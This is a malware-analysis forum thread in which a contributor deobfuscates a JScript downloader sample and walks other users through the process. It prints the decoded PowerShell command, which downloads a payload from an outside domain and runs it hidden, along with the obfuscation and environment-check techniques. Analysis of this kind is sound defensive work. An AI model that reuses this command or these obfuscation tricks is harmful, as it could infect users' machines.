var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", 
"Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");

=> The join(",") method used at the end builds a long string, with a comma after every element

var ocolr =
"syby,oty,myxrwowme,x,vyl,yvyl,usq,wowme,Xwowme,nlunoty,o,majs,syby,nlunoty,o,powwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,wowme,Rxyfn,qqwowme,gi,wowme,uvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,Luvyl,vsaqq,vyl,saqq,,yvyl,usq,uvyl,vsaqq,vyl,saqq,,wowme,Xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,cag,wowme,xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,uuvyl,vsaqq,vyl,saqq,,oty,uvyl,vsaqq,vyl,saqq,,ioNuvyl,vsaqq,vyl,saqq,,Puvyl,vsaqq,vyl,saqq,,olisyby,Ynlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uvyl,vsaqq,vyl,saqq,,BYPsaqq,xyfn,xyfn,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,cag,uvyl,vsaqq,vyl,saqq,,nopruvyl,vsaqq,vyl,saqq,,OFiLuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,cag,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,Iuvyl,vsaqq,vyl,saqq,,Nuvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,ouvyl,vsaqq,vyl,saqq,,wwowme,vyl,wowme,,xyfn,oty,yuvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,qqwowme,gi,ivyl,uvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,wowme,nuvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uzalu,nwowme,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,cag,uvyl,vsaqq,vyl,saqq,,Obuvyl,vsaqq,vyl,saqq,,jwowme,syby,uvyl,vsaqq,vyl,saqq,,oty,nlunoty,o,uvyl,vsaqq,vyl,saqq,,xyfn,Yxyfn,oty,wowme,oty,myxrwowme,x,yvyl,usq,uvyl,vsaqq,vyl,saqq,,Nwowme,oty,uvyl,vsaqq,vyl,saqq,,yvyl,usq,wwowme,vyl,wowme,,wowme,bsyby,luvyl,vsaqq,vyl,saqq,,iuvyl,vsaqq,vyl,saqq,,wowme,Nuvyl,vsaqq,vyl,saqq,,oty,fwwowme,vyl,wowme,,saqq,s,yvyl,usq,vyl,uvyl,vsaqq,vyl,saqq,,Owwowme,vyl,wowme,,Nuvyl,vsaqq,vyl,saqq,,LOuvyl,vsaqq,vyl,saqq,,saqq,vyl,uvyl,vsaqq,vyl,saqq,,fIuvyl,vsaqq,vyl,saqq,,lwowme,uzalu,oqby,qqwowme,gi,oty,oty,pwowme,tpyvi,majs,majs,wwowme,vyl,wowme,,wwowme,vyl,wowme,,wwowme,vyl,wowme,,yvyl,usq,browwowme,vyl,wowme,,nsaqq,lwowme,oty,yvyl,usq,oty,opmajs,ivyl,yvyl,usq,pqqwowme,gi,p?f=1yvyl,usq,vyl,saqq,oty,oqby,,uvyl,vsaqq,vyl,saqq,,oqby,hkyz,saqq,ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wow
me,xwowme,oqby,fwwowme,vyl,wowme,,saqq,s,iwwowme,vyl,wowme,,oty,wowme,jli,xyfn,oty,saqq,Roty,cag,puvyl,vsaqq,vyl,saqq,,rOuvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,wowme,xyfn,xyfn,uvyl,vsaqq,vyl,saqq,,nlunoty,o,uvyl,vsaqq,vyl,saqq,,hkyz,saqq,Ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,"

var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];

=> array of strings: the patterns that will be replaced by chars in the long string (note that every pattern ends with the comma left by join)
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];

=> Array of chars that replace the patterns from nedxes in the long string ocolr
Examples :

All wowme occurrences will be replaced on the obfuscated long string by e
All oqby occurrences will be replaced on the obfuscated long string by '
All majs occurrences will be replaced on the obfuscated long string by -
etc,...
The string and the two arrays are initialized; now the code is ready to do the job:


var pfixyg = false;

while (1) {

if (!pfixyg) pfixyg = 0; => the index is initialized with 0
=> pfixyg : index to scan the arrays
if (pfixyg == nedxes.length) break;

=> If all values from nedxes (the patterns) have been used => break
var ugula = nedxes[pfixyg];

=> the pattern to be replaced in the long string
switch (omide()) {

=> retrieves a value from omide()
// Host check disguised as string assembly. Every triple below contributes only
// its element [1]; elements [0] and [2] are noise. Read in order, the [1] pieces
// spell the source of a one-line function:
//   return new Object().length == 80 && typeof WScript.StdIn.WriteLine == 'unknown'
// Under Windows Script Host, typeof of a COM method reports 'unknown', so the
// expression is true only inside WSH; bufosmy switches on this value for every
// replacement. The `new Function(...)()` call compiles and runs source text
// assembled at runtime, which is the construct worth flagging in detection logic.
function omide() {
// Prototype pollution: gives every object, including the `new Object()` in the
// assembled check, a length of 80 - the first half of the condition.
Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];


// Concatenate the pieces into source text, compile it with the Function
// constructor and run it immediately; the boolean result is what bufosmy switches on.
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
}
=> function anonymous() {
return new Object().length == 80 && typeof WScript.StdIn.WriteLine == 'unknown'
}

omide() => returns true inside the real script host (see the above spoiler)

case true:

var ovhugca = new RegExp(ugula, erazyf);
=> RegExp : regular expression : is an object that describes a pattern of characters

=> ugula : the pattern to be replaced in the obfuscated command line string
=> erazyf: gi : flags for the RegExp
g : Perform a global match (find all matches rather than stopping after the first match)
i : Perform case-insensitive matching
ocolr = ocolr[replace](ovhugca, ezujigz[pfixyg]);

=> all occurrences of the current pattern (which depends on the current loop index) are replaced by the corresponding char in the obfuscated long string (the command line)
Example : Loop with index : 0

=> pfixyg : 0
=> ezujigz[pfixyg] => ezujigz[0] => "e"

Then :

=> ocolr = ocolr[replace](/wowme/gi , "e")

All wowme occurrences in the obfuscated long string will be replaced by e
break;
}
pfixyg++;


=> next index => next pattern replaced by the corresponding char in the obfuscated command line string (which then becomes less obfuscated :p )
}
return ocolr;

=> here, the end of the loop :

=> all replacements have been made
=> the deobfuscated command line string is returned
}
"cmd.eXe /c pow^eRshe^l^L^.^eX^e^ -ex^e^c^u^t^ioN^P^olicY ^BYPass -^nopr^OFiL^e^ -w^I^N^d^o^wsty^l^e^ hid^d^en^ (new^-^Ob^jec^t ^sYstem.^Net^.webcl^i^eN^t).d^OwN^LO^ad^fI^le('http ://www .brownalet.top/id.php?f=1.dat',^'%appdata%\eXe');staRt-p^rO^c^ess^ ^%aPpdata%\eXe"
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
4) Conclusion :

Small modifications that don't really make it harder to get all the malware parts.

run powershell.exe :

-executionpolicy bypass

=> overrides the execution policy for this process (the execution policy is a safety check against accidentally running scripts, not a security boundary, so it gives the malware no obstacle)
-noprofile
=> launches the script in an untouched environment (it doesn't load the Windows PowerShell profile)
-windowstyle hidden

=> hides the powershell window
(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');

=> creates a .NET object and uses its downloadfile method to download the payload and save it to disk
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe

start-process %appdata%\eXe"
=> runs the downloaded payload
-----------------
BILL-24436.js
7.js
 

DardiM


tim one

What don't you understand ?
- A big array of chars
- 2 small arrays with the same number of elements: each string in one array is mapped to the char at the same position in the other array, and that char replaces all occurrences of the old string in the big string... At the end we obtain the famous command line with cmd /c powershell etc .... url.....payload...
Natural condition, the difficulty is inherent in the context and you are doing a great and appreciable work to make this more understandable.
And it is also understandable that some people may have some difficulties but this does not detract from the merit of your work.
Very technical stuff, but it is normal to be so :)
 

DardiM


I think previous analyses of this js downloader family could help
=> https://malwaretips.com/threads/eas...ie-js-3-53-oct-19-tofsee-js-downloader.64661/
=> https://malwaretips.com/threads/eas...ader-family-oct-19-nov-2-and-8-updated.65079/


(1)
- A big array of chars => join(",") => becomes a long String : the future command line once deobfuscated.


- 2 small arrays are used to "decode" the string :

- one array with the pattern to be found on the string
- one array with the char used as replacement, on the string, of the pattern​

Example :

BIG = ["zo fpzt bfpu"]

ref = ['z', "p", "f", "v", "o" ]
mo = ['i', "a", "e", "u", "l" ]

From ref : all the z in BIG will be replaced by i IN REF
From ref : all the p in BIG will be replaced by a IN REF
From ref : all the f in BIG will be replaced by e IN REF
From ref : all the v in BIG will be replaced by u IN REF
From ref : all the o in BIG will be replaced by l IN REF

BIG = ["zo fpzt bfpu"]

=> BIG decoded : ["il fait beau"]​

(2) To find the run part (when the script run the payload) :

We must find where the shell.run(.......) is

=> On the previous sample :

Like :

rzerzek.run(BIG,jhgjgjgq)
=> on the current sample

Like :

rzerzek["r"+"un"](BIG,jhgjgjgq)​

In older samples, a simple search for the word "run" was enough to find the run part (hidden among a lot of useless lines of code)

Current sample :

=> they have split the word "run" to defeat a search for it : "r"+"un"
=> searching for the name of the command line variable instead lets us find the run part quickly

Conclusion :

- easy to find where are the command line parts
- easy to find the run part
- in a script that is very, very long, only these few parts are useful​
 

Sr. Normal 2.0

Where can i learn klingon, please? :p No, seriosly, thanks for your work. :)
I try to read it normally, o_O then backwards, o_Oo_O avoiding one in three characters o_Oo_Oo_O .... nothing my friend, this is stronger than me. I think studying kinglon to have more possibilities :oops:
 

DardiM

An awesome job as always @DardiM. Thanks for taking the time explain everything in such detail.

I found it amusing they used the function called bufosmy(). Presumably this is an anagram of "my obsfu"?
Thanks :)

"my obfus" => "my obfuscation"
Good observation, I have not seen the link before you talk about this :):oops:
 

DardiM

Where can i learn klingon, please? :p No, seriosly, thanks for your work. :)
I try to read it normally, o_O then backwards, o_Oo_O avoiding one in three characters o_Oo_Oo_O .... nothing my friend, this is stronger than me. I think studying kinglon to have more possibilities :oops:
The purpose and method used to make my posts :

- I only post analysis of obfuscated samples, so all parts are like klingon, because it is really what we can see when looking at the whole code, but I always explain what these parts mean :) (and how to find how to decode it : like a puzzle).

- Really basic Knowledge in scripting language (or other language) is needed, but I can't teach it :) : I only show the tricks/methods that was used to obfuscate the script, and how to deobfuscate it.

- Once I showed that strange parts are only "klingon variables names" with an understandable content (and how the maker of the script has obfuscated it), and that they only use these "klingon names" in the following parts, to build "klingon sentences",
=> I translate these strange parts (replacing the "klingon sentences" by the understandable content) to spare people the job, and show what the script really does (next to the obfuscated parts).
=> So, to understand, most people just have to read the part in "green" that are the translation of this klingon language in "blue".

- Then, at the end, I always show the real important parts of the script : URLs used and payload (to blacklist).​

I understand that even this way it can be hard to understand the deobfuscation part without basic scripting language knowledge (or other languages) , but it's normal, I think.

I could only post analysis explaining what the sample makes - I mean "once deobfuscated", clearly, easily and
- not speaking about the obfuscation part (or not in detail)
- not trying to show how to deobfuscate it
=> but it is really not what I want
=> I will only post analyses like "puzzle" games (I really choose the sample because of the obfuscation method(s) used), assuming that people who read the deobfuscation part have a basis in scripting languages,
and at the end information about URLs / payload.

"I think studying kinglon to have more possibilities :oops:"

=> a good JavaScript tuto will do the job (even to understand my analysis from vbs) :)
 

Sr. Normal 2.0

The purpose and method used to make my posts :

- I only post analysis of obfuscated samples, so all parts are like klingon, because it is really what we can see when looking at the whole code, but I always explain what these parts mean :) (and how to find how to decode it : like a puzzle).

- Really basic Knowledge in scripting language (or other language) is needed, but I can't teach it :) : I only show the tricks/methods that was used to obfuscate the script, and how to deobfuscate it.

- Once I showed that strange parts are only "klingon variables names" with an understandable content (and how the maker of the script has obfuscated it), and that they only use these "klingon names" in the following parts, to build "klingon sentences",
=> I translate these strange parts (replacing the "klingon sentences" by the understandable content) to avoid people to do the job, and show what the script makes in reality (near obuscated parts).
=> So, to understand, most people just have to read the part in "green" that are the translation of this klingon language in "blue".

- Then, at the end, I always show the real important parts of the script : URLs used and payload (to blacklist).​

I understand that even this way it can be hard to understand the deobfuscation part without basic scripting language knowledge (or other languages) , but its normal, I think.

"I think studying kinglon to have more possibilities :oops:"

=> a good JavaScript tuto will do the job (even to understand my analysis from vbs) :)
Thanks for your reply, I really appreciate it. :)

What I really hope is not to have bothered you because I highly value the work you do and I have a sincere respect for you. :)
I express myself, or try to express myself, in a humorous way because I certainly do not have the intelligence to correctly understand computer programming.:( Many years (wow, too many) I learned to do small programs in Basic (oh! The goto instruction did miracles for me :cool:) and when I tried to learn structured languages (C ++, Pascal ...) was for me as Klingon. o_O Not like the right Klingon, rather like the Klingon that must be spoken in interstellar taverns in the wee hours of the morning.:eek:

Thanks again for your response and for your time. You are an inspiration and do a commendable job. :)
 

DardiM

Thanks for your reply, I really appreciate it. :)

What I really hope is not to have bothered you because I highly value the work you do and I have a sincere respect for you. :)
I express myself, or try to express myself, in a humorous way because I certainly do not have the intelligence to correctly understand computer programming.:( Many years (wow, too many) I learned to do small programs in Basic (oh! The goto instruction did miracles for me :cool:) and when I tried to learn structured languages (C ++, Pascal ...) was for me as Klingon. o_O Not like the right Klingon, rather like the Klingon that must be spoken in interstellar taverns in the wee hours of the morning.:eek:

Thanks again for your response and for your time. You are an inspiration and do a commendable job. :)
"What I really hope is not to have bothered you ..."
No, because you, at least, wrote on my post (not on another posts) that you don't understand them not insinuating "because of the writer fault"
=> this is the real intelligence :)

"I certainly do not have the intelligence to correctly understand computer programming"
I don't think so :p
And a lot of people that understand computer programming are not specially intelligent ;)
(and vice versa)

The only thing that can bother me : people that don't understand without seeing that the reason could be on their side (or on both sides : that is also why I often update the threads to be more understandable, but will never teach on it the scripting language part) :D

=> I have just taken advantage of the opportunity to explain the aims of my posts :) (to "all" the people - The most concerned will certainly not read this thread :rolleyes:).
"in a humorous way" + "Thanks for your reply, I really appreciate it. :)"
=> I like your sense of humor and person, if not : I would not have answered ;)

I will try to find really good JavaScript/VBS tutorials that could help (the methods used to deobfuscate parts of script-based malware are only combinations of basic operations) :)
 

DardiM

@DardiM Thanks my friend. :)

Lately I'm too busy, but I promise to give it a try.

Thanks again my friend the king of Penguin and Bats :p

In Spanish we can find this course of a really prestigious site

Java has nothing to do with JavaScript/JScript.

One explanation I made : Video Review - More Fun with Ransomware Part 7

But once you know one language, there is some part that help to understand almost any language (the basic operations).

=> If I can't find an easy tuto, I will make one targeting what is the most used in the script-based samples.
 

Sr. Normal 2.0

Java has nothing to do with JavaScript/JScript.

One explanation I made : Video Review - More Fun with Ransomware Part 7

But once you know one language, there is some part that help to understand almost any language (the basic operations).

=> If I can't find an easy tuto, I will make one targeting what is the most used in the script-based samples.

Thanks my friend. Well, i think the first step should be HTML, right? . Perhaps this old dog must begin for here, little by little. Thanks my friend for your dedication
 

DardiM

Thanks my friend. Well, i think the first step should be HTML, right? . Perhaps this old dog must begin for here, little by little. Thanks my friend for your dedication
It depends of what you want :)

The script-based samples from Malware Vault are 99.99% scripts that run under the Windows Script Host environment : no HTML code inside => HTML is the standard markup language for creating web pages and web applications.
JavaScript is widely used in HTML web pages, but it is a scripting programming language, and it can also be used in scripts that run under the Windows Script Host environment (WScript.exe / CScript.exe). In fact, this is like other scripting languages : mainly inside a webpage or under the Windows Script Host environment.

If you don't want to make some webpage /website/web applications, it is better, I think, to begin learning a programming language like Java/C++/C#/VB.Net
=> then it can also be useful if you want to make some personal progs
=> once one of these programming languages is known, it is not very difficult to learn another one.
 

tim one

Why these .js samples are so dangerous?

Some codes, after a certain timeout, dynamically can load another javascript code hosted on a site under the control of the attacker.
Starting from the violation of one or more sites, based in this case, the
malicious code can load the payload of the attack from another site.

Often, they do not inject directly the malicious code on compromised sites because the loader does not include only a website from which to download the malware. Starting from the assumption that sooner or later the sites will be blacklisted, the attacker wants to have a bit of flexibility, and then separate the loader from one or more malicious different codes that he put around the Internet.
In general these stages still allows a bit of flexibility to manage any update to the code of the malware itself.

Of course, a javascript loaded and executed in the browser can do a lot of damage. For example, it can send my credentials via HTTP to a site controlled by the attacker or, even "better", it can download other executable malicious code on my PC.
 

DardiM

update :

Added one new sample:

From https://malwaretips.com/threads/23-11-2016-20.65760/#post-568222
thanks to @XIII

BILL-24436.js

1) Main difference :

SEE THE FIRST POST FOR EXPLANATIONS

Obfuscated Command Line String :

var ilfygpud = "vnyvequf,mpafi,ibdun,yibdun,v,ipx,ibdun,rif,xyvd,ubu,equf,xequf,mpafi,juafequf,,equf,xyvd,x,agaibdun,jequf,,vnyvequf,mpafi,ibdun,yibdun,v,ipx,mpafi,juafequf,,equf,xyvd,x,pcxobc,ompafi,equf,rafequf,,cxobc,ibdun,equf,lLcxobc,ubu,equf,xequf,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,badn,equf,Xcxobc,equf,vnyvequf,mpafi,ibdun,yibdun,v,ipx,Ucxobc,vequf,mpafi,ibdun,yibdun,v,IOcxobc,Ncxobc,polIvnyvequf,mpafi,ibdun,yibdun,v,ipx,cxobc,ympafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,cxobc,Bycxobc,Plyibdun,f,cxobc,afequf,,afequf,,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,badn,cxobc,ncxobc,OPrcxobc,oFcxobc,Ilcxobc,equf,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,cxobc,badn,mpafi,INxyvd,ompafi,afequf,,cxobc,vequf,mpafi,ibdun,yibdun,v,yLequf,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,ibdun,cxobc,icxobc,xyvd,xyvd,cxobc,equf,ncxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,cxobc,afequf,,aq,nequf,mpafi,badn,OBjcxobc,equf,vnyvequf,mpafi,ibdun,yibdun,v,ipx,cxobc,vequf,mpafi,ibdun,yibdun,v,cxobc,mpafi,juafequf,,equf,xyvd,x,mpafi,juafequf,,equf,xyvd,x,afequf,,yafequf,,vequf,mpafi,ibdun,yibdun,v,equf,ibdun,rif,cxobc,ubu,Ncxobc,equf,vequf,mpafi,ibdun,yibdun,v,ubu,cxobc,mpafi,equf,bvnyvequf,mpafi,ibdun,yibdun,v,ipx,Licxobc,equf,ncxobc,vequf,mpafi,ibdun,yibdun,v,bplyibdun,f,f,ubu,xyvd,Ompafi,nlcxobc,Ocxobc,lyibdun,f,xyvd,cxobc,FILcxobc,equf,afequf,,aq,equf,ibdun,ugb,ibdun,vequf,mpafi,ibdun,yibdun,v,vequf,mpafi,ibdun,yibdun,v,prvequf,vequf,mpafi,ibdun,yibdun,v,i,agaibdun,jequf,,agaibdun,jequf,,mpafi,mpafi,mpafi,ubu,blyibdun,f,lyibdun,f,afequf,,lorequf,llyibdun,f,bubu,mpafi,lyibdun,f,ngagaibdun,jequf,,uafequf,,equf,rubu,pibdun,p?f=1ubu,xyvd,lyibdun,f,vequf,mpafi,ibd
un,yibdun,v,equf,ibdun,ugb,,equf,ibdun,ugb,nxylvequf,mpafi,ibdun,yibdun,v,,lyibdun,f,PPxyvd,lyibdun,f,vequf,mpafi,ibdun,yibdun,v,lyibdun,f,nxylvequf,mpafi,ibdun,yibdun,v,,ubu,equf,Xequf,equf,ibdun,ugb,bplyibdun,f,f,raibdun,vequf,mpafi,ibdun,yibdun,v,,afequf,,cxobc,vequf,mpafi,ibdun,yibdun,v,cxobc,lyibdun,f,Rvequf,mpafi,ibdun,yibdun,v,cxobc,badn,pRcxobc,Ocxobc,vnyvequf,mpafi,ibdun,yibdun,v,ipx,equf,cxobc,afequf,,afequf,,mpafi,juafequf,,equf,xyvd,x,nxylvequf,mpafi,ibdun,yibdun,v,,lyibdun,f,pPxyvd,lyibdun,f,vequf,mpafi,ibdun,yibdun,v,lyibdun,f,nxylvequf,mpafi,ibdun,yibdun,v,,ubu,equf,xequf,"​

Array of strings with the patterns that will be replaced by chars in the obfuscated Command Line String
var izyme = ['ibdun,', 'equf,', 'badn,', "mpafi,", "vewhyhv,", "cxobc,", "xyvd,", "nxylt,", "afe,", "wjusedx,", "vnytipx,", 'agahje,', "azuji,", "raht,", "hrif,", 'ubu,', 'saq,', "rveti,", 'ehugb,', "lyhf,", 'bpaf,'];​

Array of chars that will replace the patterns from izyme in the obfuscated Command Line String
var jmijkewxa = [['h'][0], ["e"][0], ["-"][0], ['w'][0], ['t'][0], ["^"][0], ['d'][0], ["%"][0], ["s"][0], [" "][0], ['c'][0], ["/"][0], ["\,"][0], [";"][0], ['m'][0], ['.'][0], ["("][0], [":"][0], ["'"][0], ["a"][0], [')'][0]];​

here is the main change from the previous sample :

=> each value is no longer directly a char, but a one-element array from which the char is retrieved by index 0 :D

['h'][0] => "h"
["e"][0] => "e"
then :

var jmijkewxa = ['h', "e", "-", 'w', 't', "^", 'd', "%", "s", " ", 'c', "/", "\,", ";", 'm', '.', "(", ":", "'", "a", ')'];
The script performs the same operations to get the deobfuscated command line :

We get :

